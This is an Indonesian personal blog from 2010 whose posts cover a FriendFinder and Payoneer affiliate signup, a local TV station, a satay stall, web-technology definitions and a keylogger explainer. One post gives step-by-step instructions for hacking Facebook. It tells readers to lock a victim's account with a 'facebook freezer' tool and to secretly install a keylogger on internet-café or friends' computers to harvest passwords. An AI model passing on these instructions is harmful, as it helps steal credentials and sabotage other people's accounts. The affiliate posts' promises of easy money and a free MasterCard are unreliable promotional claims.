Selasa, 28 September 2010


jadi jomblo memang tak mengenakan bagi sebagian orang, kesepian, tak ada tempat berbagi selalu menghinggapi para ijo lumut (ikatan jomblo lucu dan imut).
sudah berbagai cara di tempuh oleh para jombloers untuk mendapatkan pasangan, dan berbagai media pun juga di tempuh, mulai dari media langsung, sms, email, facebook, twitter dan lain2.
tapi hasilnya kurang memuaskan, karena dewasa ini banyak sekali penculikan, penipuan dan orang yang tak bertanggung jawab berkeliaran di facebook dan situs jejaring sosial lainya, tentu saja
orang sekarang lebih hati2 dan waspada dengan aktivitas nya di situs jejaring sosial. dewasa ini orang2 di facebook cenderung lebih selektif dalam memilih teman. jadi gimana mau cepat dapat pacar di facebook jika teman saja lebih selektif dalam memilih?
tapi jangan khawatir juga untuk para jombloers indonesia ada alternaif kok, yaitu masih lewat media internet tapi situs ini khusus dating/ yang mau cari pacar, asix kan....
nama website ini adalah friendfinder, sebuah website khusus cari pacar seperti hal nya facebook website ini juga menyediakan layanan chating yang khusus para jomblo.
website ini bukan website kecil/ komunitas kecil tapi website komunitas besar yang berjalan dari tahun 1999-sekarang. sudah banyak orang yang bertemu di website ini dan akhirnya memutuskan untuk menikah.
selain anda akan mendapatkan teman kencan baru/pacar baru, anda juga akan mendapatkan master card grtis + uang , jika anda mengikuti program affilate friendfinder
so, ikutan gabung yuk .. karena pendaptaran tak dipungut biaya/gratis dan juga dapat uang +pacar baru +uang , tunggu apalagi...
untuk panduan mendaptar silahkan klik di sini

anda putus cinta dan patah hati? huft.. sekarang tak zaman nya lagi menangis karena patah hati, buat apa di tangisi? mendingan cari lagi alias "berburu perawan" di friendfinder.
kalau ga tau friendfinder emmmz... keterlaluan banget.
friendfinder adalah website networking yang khusus untuk para jomblo yang ingin mencari pasangan (dating networking).
silahkan jika anda mau daftar klik disini
apa sih keuntungan nya?
tentunya keuntungan nya banyak sekali buat anda yang ingin mencari pasangan.
bahkan sebagian orang yang kenal lewat friendfinder melanjutkan untuk menikah..
so... buat apa harus tunggu lama2 daftar aja,
kali aja anda mendapatkan cinta sejati anda, mumpung daftarnya GRATIS ....!!

anda pemula dalam bisnis online? tentu anda mengenal yang namanya paypal, yupz... benar sekali, paypal adalah alat pembayaran yang cukup vital yang digunakan untuk berbisins internet.
mulai dari mengirim uang, merequest uang dan lain2. tapi kadang2 banyak orang yang mengeluh tentang cara untuk memverifikasikan paypal, karena harus menggunakan kartu kredit, VCC, atau pun yang baru
diluncurkan adalah menggunakan rekening bank.
tapi bagaimana jika anda tidak punya kartu kredit, VCC, ataupun rekening bank? tentunya ini menghambat anda untuk mencari uang via internet,
JANGAN KHAWTIR, saya menyarankan anda untuk menggunakan mastercard gratis dari frienfinder, untuk cara-cara mendapatkan nya silahkan klik di sini.

Kamis, 16 September 2010



belum lama ini, karawang kehadiran statsiun televisi lokal pertama .
kctv atau sering di panggil karawang citra tv memang tergolong statsiun lokal baru, tapi taukah anda dengan didukung peralatan yang modern dan pekerja yang profesional di bidang nya menjadikan tv ini tak kalah dengan tv nasional. dengan jiwa baru statsiun tv ini yang berlogo " mantap coy" mendedikasikan untuk menjadi televisi berwawasan global.
tentu saja kehadiran kctv memberi nuansa baru bagi masyarakat karawang dan memberi rasa bangga kepada masyarakat karawang karena program-program nya mengangkat budaya karawang.
kctv berkantor di jl.prolamasi tanjung pura, karawang barat, karawang. program yang interaktif mampu menarik penonton dari penjuru karawang, program2 tersebut diantaranya program news yang bernama " nuansa karawang" yang hadir setiap hari setiap jam: 06.00 pagi, 01.00 siang, 07.00 malam, yang di pandu oleh presenter suci andari, vefy prianty, dan lain~lain.
selain itu untuk program musik pop anak muda " karawang request" tayang setiap selasa, kamis, dan jum'at pukul 04.30 sore, yang di pandu oleh mojang-mojang karawang yang cantik.
untuk acara budaya jawa barat tayang setiap 08.00 malam.
untuk mendapatkan chanel ini anda cukup meng arahkan antena anda ke tanjung pura karawang, chanel 21 UHF 471,25 MHz.
saya pribadi merasa bangga juga,, ya.....karena kantor kctv tak jauh dari rumah saya..(hehehe) hanya berjarak 50 meter lah... selain itu kampung saya jadi iktan rame, yang biasanya sepi eh... sekarang jadi rame,, hehehehe
yang saya sukai dari kctv ini adalah vt nya seorang petani yang sedang tandur bareng dan mengacungkan jempol nya sambil berkata" urang mah kctv wae..." menurut saya that's amazing... menggambarkan kegotong royongan masyarakat karawang ( terlihat banyak petani tandur dalam 1 kotak sawah).

SO, don't forget this slogan " kctv.... mantap coy..!!"


siapa yang tak tau sate, makanan khas indonesia yang banyak di gemari oleh orang tua, muda, sampai anak2.
liburan kemarin tak sengaja saya menemukan makanan khas sate karawang di dalam terminal tanjung pura karawang.
sate atau yang biasa di sebut sate "mang bule" mengaku sudah hampir puluhan tahun berdagang di dalam terminal tanjung pura, dan tentunya sate "mang bule" ini sudah mempunyai pelanggan setia, dari kalangan pejabat daerah sampai jawa barat, pemain sepakbola se tingkat nasional.
sampai ada orang yang datang jauh-jauh dari bandung hanya untuk mampir di warung sate "mang bule".
apa sih rasa sate yang konon bisa mendatangkan orang dari jauh hanya untuk mampir??
setelah di selidiki, memang rasa sate di "mang bule" ini beda dengan yang lain, menurut saya kekuatan rasa sate ini ada pada daging ayam yang segar, di racik dengan bumbu yang pas..
membuat orang ingin kembali lagi mencicipi rasa sate ini.
setlah lama saya berbincang-bincang, tak terasa saya sudah menghabiskan 20 tusuk( mungkin saking enak nya dan ngobrol yang begitu asix)
dan saya kaget ketika saya mau membayar sate tadi, ternyata harganya terjangkau...( saya pikir harganya mahal, coz satenya enak, tapi kok harganya murah)
harga nya yang bersahabat membuat saya membungkus untuk di makan lagi di rumah.
sekarang warung sate " mang bule" sudah menjadi daftar menu saya setiap hari,,
tak salahnya jika anda mengadakan syukuran/ pernikahan, untuk memesan sate ini...
akh udah dulu yah... cerita terus jadi laper lagi....


Langsung saja…
saya akan menjelaskan bagaimana caranya agar anda memiliki penghasilan tambahan
melalui Friend-Finder.com plus
Kartu Debit MasterCard GRATIS dari Amerika !!



Simak dan ikuti langkah-langkah berikut ini :



Baru-baru ini saya menemukan cara untuk mendapakan KARTU DEBIT MASTERCARD GRATIS dari salah satu Bank di amerika Yaitu Payoneer.com.. yang Dikirim langsung Kerumah..ASYIKKAN ??!!

Cara ini sebenarnya sudah bertebaran di Internet dan melalui WEB ini saya akan berbagi kepada anda.

Untuk apa sih Kartu Debit tersebut..?

Kartu itu berfungsi seperti kartu Debit pada Umumnya, anda juga bisa gunakan untuk Verifikasi Paypal dan mencairkan Paypal anda, bisa juga untuk menerima pembayaran dari Bisnis online tertentu yang anda ikuti.. selain itu bisa di gunakan untuk menarik uang di ATM Berlogo mastercard juga untuk berbelanja.

Sebenarnya Payoneer.com belum menerima orang Indonesia untuk membuka rekening di sana, hanya saja kita di Ijinkan membukannya jika menjadi member dari Friend-Finder.

Situs Friend-Finder sendiri adalah situs pertemanan, dan juga memiliki cabang-cabang situs PERTEMANAN lainnya, bisnis online dan lainnya..

Satu lagi yang perlu saya sampaikan bahwa situs ini juga Memberikan KOMISI (Imbalan) bila kita berhasil merekrut orang untuk mendaftar, sekalipun itu hanya sebagai free member.. bayaran yang didapat adalah $.1 untuk pendaftar laki-laki dan $.2 untuk pendaftar perempuan. Lumayankan... Buat tambah-tambah ??! (ko bisa beda laki-laki sama perempuan... jangan tanya saya ya… memang begitu ketentuannya he.he).

Oke deh tidak perlu berpanjang lebar.. jadi begini caranya INGAT ada 2 LANGKAH ..


Anda harus Daftar dulu: (100% Gratis)


Klik Link Free signup ===>>> www.friend-finder.com


Lalu ikuti langkah-langkah berikut ini :


Langkah Pertama :
Tautan

klik JOIN NOW Isilah data-data Anda dg lengkap.

(Perhatikan Kolomnya jika tidak paham silahkan lihat petunjuk dibawah ini: )
» I am a : Man jika Anda laki-laki, Woman jika Anda perempuan
» Interested in meeteng a : Man jika ingin mencari/berteman dg laki-laki, woman dg perempuan, atau bisa Anda pilih dua-duanya.
» For : Friendship (berteman), Dating (ketemuan), Serious relationship (hubungan serius),
» Marriage (menikah), bisa Anda pilih lebih dari satu, pilih semuanya juga bisa.
» Birthdate : Tanggal lahir Anda.
» Country : Negara Anda.
» Zip/Postal code : Kosongkan saja, jika Anda berada selain di Amerika ( US only)
» Email Address : Isikan email Anda
» Username : username Anda antara 4 sampai 16 karakter
» Lalu klik Click Here and Have Fun

Setelah itu Anda masuk ketahap berikutnya.


» City : Kota tempat tinggal Anda
» Closest City: Sama seperti diatas
» State: Propinsi Anda
» Your Height : Tinggi Anda
» Your Body Type : Tipe badan Anda
» Your Race : Ras Anda atau suku Anda biasanya kalau Indonesia adalah Asia
» Marital Status : Status pernikahan Anda
» Your Religion : Agama Anda
» Your Education : Pendidikan terakhir Anda
» Your Occupation : Pekerjaan Anda misal: Staff office, jika Anda pegawai, Business jika Anda pengusaha dll.
» Introduction Title : Judul tentang diri Anda, misal : I am a good Man atau I like Travelling, dll minimum 10 karakter
» Tell others about yourself : Ceritakanlah tentang diri Anda, misalnya: I am a good women, I like travelling and my hobby reading, computer, sports, and others, i love new friend men or women, buatlah suka-suka Anda, minimumnya 50 karakter.
» Jika Anda sudah memiliki foto uploadlah foto Anda, klik browse lalu carilah file yg berisi foto Anda. Jika Anda belum punya fota bisa Anda kosongkan dulu, nanti dikemudian hari bisa Anda isi kembali.

Setelah itu klik Click to Join.

Maka akan ada email masuk di email anda. Setelah itu bukalah email Anda, lalu klik Activate Now Maka Anda sudah diaktivasi, jika Anda ingin login isilah dg username dan password yg ada di email Anda. Setelah itu keluarlah dulu, dengan klik log out .


LANGKAH KEDUA:

klik untuk membuat affiliasi sumber dollarnya.


» Klik home ( di dasbor)
» Lalu klik "earn money for webmaster" ( ada di menu home , samping kiri bagian bawah)
Isilah data-data tsb dg benar.


» Preferred Program: Pilihlah no 1
» First Name: Nama pertama Anda
» Last Name: Nama akhir Anda
» URL: Website/blog Anda, wajib Anda isi, jika Anda belum punya buatlah blog gratis di mana saja seperti di Blogger.com

» Desired Password : Password yg Anda inginkan
» Preferred Newsletter Language: English
» Email Address: Masukkan email Anda
» Secondary Email Address: Email Anda yg lain, boleh juga dikosongkan
» Checks Payable To: Nama lengkap Anda sesuai KTP
» Street Address: Alamat Anda sesuai KTP
» City: Kota tempat tinggal Anda
» State/Province: Provinsi tempat Anda tinggal
» Country: Negara Anda
» ZIP/Postal Code: Kode Pos kota Anda
» What is your business tax classification? Pilih NON US BUSINESS
» Tax ID or Social Security Number: Kosongkan saja karena untuk warga Amerika saja
» Phone Number: No telp Anda, misalnya no telp Anda: 021 1234567 maka buat 6221 1234567 atau no hp Anda 081xxxxx maka buat 6281xxxxx.( harus pakai kode 62, yaitu kode telphone Indonesia)
» Which Instant Messenger do you use? Pilih saja None
» Use ePassporte : Pilih saja No
» Setelah itu klik Click Here for the Last Step
» Lalu klik (di checklist) kotak kecil yg ada tulisan mengenai agreement

Yes, I have read and accepted the Affiliate Agreement, …….. Lalu klik Submit. Setelah itu klik Account Information Lalu klik yg warna biru di tulisan Here is your account information. Click here to update your information.

kemudian muncul halaman edit account anda, lihatlah tulisan pada kolom tengah seperti dibawah ini :

» klik Payoneer: Signup to be paid by Prepaid MasterCard®.You will be directed to a FriendFinder page hosted by Payoneer, where you can sign up for a card.
» Lalu isilah data-data Anda di Payoneer tsb ikuti langkah-langkah disebelah kiri atas dengan meng-klik langkah 1 s/d langkah 3, setelah anda isi langkah satu s/d 3 check list lah seluruh kotak kecil dibawahnya kemudian klik finish, setelah Anda Isi dengan lengkap tunggulah kira-kira 25 hari kerja kartu Anda akan sampai di rumah Anda, setelah kartu debit Anda sampai lalu aktivasilah ikuti petunjuk yang ada disurat yg dikirim bersama dg kartu Anda. Nah gampangkan..

Hanya dg menjadi member FriendFinder, Anda bisa dapat kartu debit dari payoneer, kalau Anda langsung daftar di payoner Anda tidak bisa mendapatkannya karena country untuk Indonesia tidak ada.





~cms atau singkatan dari content management system, suatu software yang berguna untuk memanipulasi content atau isi dari suatu situs web.
maksud dari manipulasi di sini adalah menambah, mengedit atau menghapus isi dari situs. dengan cms, semua itu bisa di lakukan tanpa pengguna harus belajar HTML atau bahasa pemograman web. karena CMS bisa berbasis web atau pun aplikasi desktop biasa.







~MySQL adalah salah satu Relational Database Management System (RDBMS) yang di distribusikan secara gratis. MySQL merupakan database open source yang cukup banyak di gunakan pada berbagai aplikasi.
kehandalannya dalam mengolah database di tunjang
kecepatan mengakses query, serta banyaknya fitur- fitur yang di miliki menjadikannya sebagai database idola saat ini.



~PHP adalah skrip pemogram yang bersifat server side yang ditambahkan ke dalam HTML. php membuat suatu aplikasi dapat di intergrasikan kedalam HTML sehingga halaman web tak lagi bersifat statis, tetapi bersifat dinamis. php termasuk bahasa pemograman web yang cepat berkembang dan diminati
oleh banyak orang. salah satu alasan nya adalah dekatnya program php dengan bahasa C, sehingga yang sudah terbiasa dengan bahasa C bisa dengan cepat beradaptasi dengan php.

dewasa ini, banyak orang yang menganggap hacking/ hacker(orang yang melakukan ilmu hacking di sebut hacker) identik dengan pencurian data, penyebar virus, pembuat virus berbahaya, dan cybercrime. sebenarnya saya kurang setuju dengan penyebutan hacker sebagai cybercrime.
hacking adalah teknik untuk mempelajari sistem komputer secara mendalam dengan menggunakan metode trial dan error.
kadang kala teknik ini dapat menemukan suatu hal yang tidak pernah terpikirkan sebelumnya oleh para hacker. misalnya linus torvalds seorang hacker sekaligus pencipta linux, anda pasti tahu kan linux, sebuah os open source, dia tidak menyalah gunakan ilmu nya untuk kegiatan2 ilegal/ kejahatan komputer, tapi ilmu nya di gunakan untuk hal yang positif.
so, jika anda menemukan/ jadi korban pencurian password, jangan dulu menyalahkan hacker bisa jadi itu cracker ( pembuat program berbahaya bertujuan untuk cybercrime). dan tetap hati2 supaya anda terhidar dari si cracker. jangan mendownload program sembarangan. waspadalah... waspadalah.. hehehe ( kaya bang napi ).


posted by. dendidarko 46 krwj

Selasa, 07 September 2010

istilah ini biasa di sematkan untuk para hacker baik/jahat/ cracker, knapa saya menyematkan untuk para hacker baik/jahat, karena keylogger/keylogger ini, bagai pisau bermata dua,
bisa dibuat untuk kejahatan, misalnya untuk pencurian data dari si korban atau untuk kebaikan, misalnya untuk parental control, jd orang tua bisa memantau kegitan anak2 nya selama bermain internet.
cara kerja dari aplikasi ini adalah menyadap keyboard, jadi setiap ketukan/ketikan tombol keyboard akan di sadap. semua aktivitas/ pasword akan di sadap oleh keylogger ini, tapi lain lagi jika seseorang/korban mencopy paste pasword misal copy paste pasword dari email ke facebook, keyloger tdk bisa membaca pasword tersebut.
jadi terserah anda mau digunakan untuk kebaikan atau kejahatan?? (dosanya di tanggung sendiri, hehehe)

Minggu, 05 September 2010

bicara soal freezer, saya jadi teringat sewaktu saya masih sekolah di smk bk2 krw, tentang mempelajari sistim AC ( hehe jd inget pak usep) , freezer berasal dari bahasa inggris yaitu beku/membekukan.
jadi facebook freezer adalah sebuah aplikasi yang bertujuan untuk membekukan akun seseorang di facebook, seseorang/ korban anda yg sudah terkana aplikasi ini tidak bisa mengakses facebook nya, karena sudah anda bekukan.
bila di facebook anda ada orang yang menyebalkan, sering mengganggu anda, tak salahnya anda bekukan akun facebook nya..
bagaimana cara menggunakan nya?
don't worry silahkan klik di sini..

facebook adalah situs jejaring sosil yang sangat populer pada saat ini,berkat banyaknya pengguna, tak jarang banyak orang yang ingin menghack facebook untuk keperluan masing2,
tanpa panjang lebar, saya akan jelaskan tata cara hack facebook, banyak cara untuk hack facebook, mulai dari memakai keylogger, fake login, facebook freezer, di sini saya akan memakai dua cara yaitu dengan keylogger dan facebook freezer, knapa saya pilih cara kedua itu,?? tentunya
cara itu lebih gampang.
bagi anda yg tidak tau keylogger , jangan khawatir silahkan klik disini

dan bagi anda juga yg tidak tau facebook freezer klik disini

Sebuah aplikasi..... selenkapnya klik




oke.. udah g sabaran ya??
langsung saja ke tkp

- untuk facebook freezer ,
~ pertama2 download dulu disini
~ kemudian jalankan
~ selanjutnya masukan email yg digunakan pada facebook si korban,
~klik freeze
~ selesai

nah untuk yang keylogger , hack jenis ini lebih tepat di gunakan di warnet2 yg tidak menginstal deepfreezer, karena akan percuma.
knapa saya sarankan di warnet?? karena akan banyak password facebook yg terjaring, atau di komputer teman anda, bila anda ingin menghack teman anda..

~pertama2 download software nya di sini
~
ekstaks dan jalankan aplikasi tersebut
~masukan pasword anda dua kali
~ selesai
~ tutup aplikasi
~ untuk membuka aplikasi tekan ALT+CTRL+SHIFT+Y

~ jika anda ingin membuktikan silahkan login facebook anda di komputer yg sudah di instal keylogger, kemudian tutup facebook anda , setelah itu buka keylogger yg sudah anda instal, LIHAT APA YG TERJADI?? semua pasword , email, dan apa yg anda ketikan akan terpampang jelas di keylogger ini...

harap jangan salah gunakan ilmu yang sudah saya share , lain kali saya akan mengulas tentang cara hack dengan fake login ( login palsu).

beberapa hari sempat HIATUS


istilah dalam blogger, yang berarti puasa dalam melakukan postingan



, bingung mau posting apaan..
tapi beberapa hari yang lalu, untuk pertama kalinya saya mencoba menggunaka browser google chrome, awalnya sempat bingung karena tampilan yang sangat simple tapi banyak fitur yang tersimpan.
naaah oleh karena itu saya akan sedikit mengulas tentang google chrome.

~ fitur all in one pada aplikasi selalu menjadi dambaan user untuk efisiensi dan efektivitas kerja. hal ini lah yang dilihat google dalam membuat aplikasi browser nya dikenal dengan google chrome.
seiring dengan waktu, berbagai fitur baru ditambahkan pada versi terbaru nya, dan saat ini sudah mencapai versi 3.0.195.27 yang mana telah memiliki integrasi serial gears, javascript virtual machine yang dikenal dengan v8,
sekumpulan tab baru serupa opera yang menyertakan speed dial, serta navigation bar tambahan baru serupa firefox.
kesemuanya berbasiskan pada webkit engine yang telah digunakan juga pada browser safari . pada versi ini perbaikan di tujukan pada crash v8, isu mengenai menu item dalam bahasa india yang tidak tampil dengan benar dan penambahan dukungan NTLMv2 pada windows, dukungan blacklist faux sertifikat www.paypal.com dan NV/DBcompat secara tepat bagi file-file FFmpeg.

google chrome 3.0.195.27 bisa di download softpedia/get/internet/Browsers/Google-Chrome.shtml





Popular Posts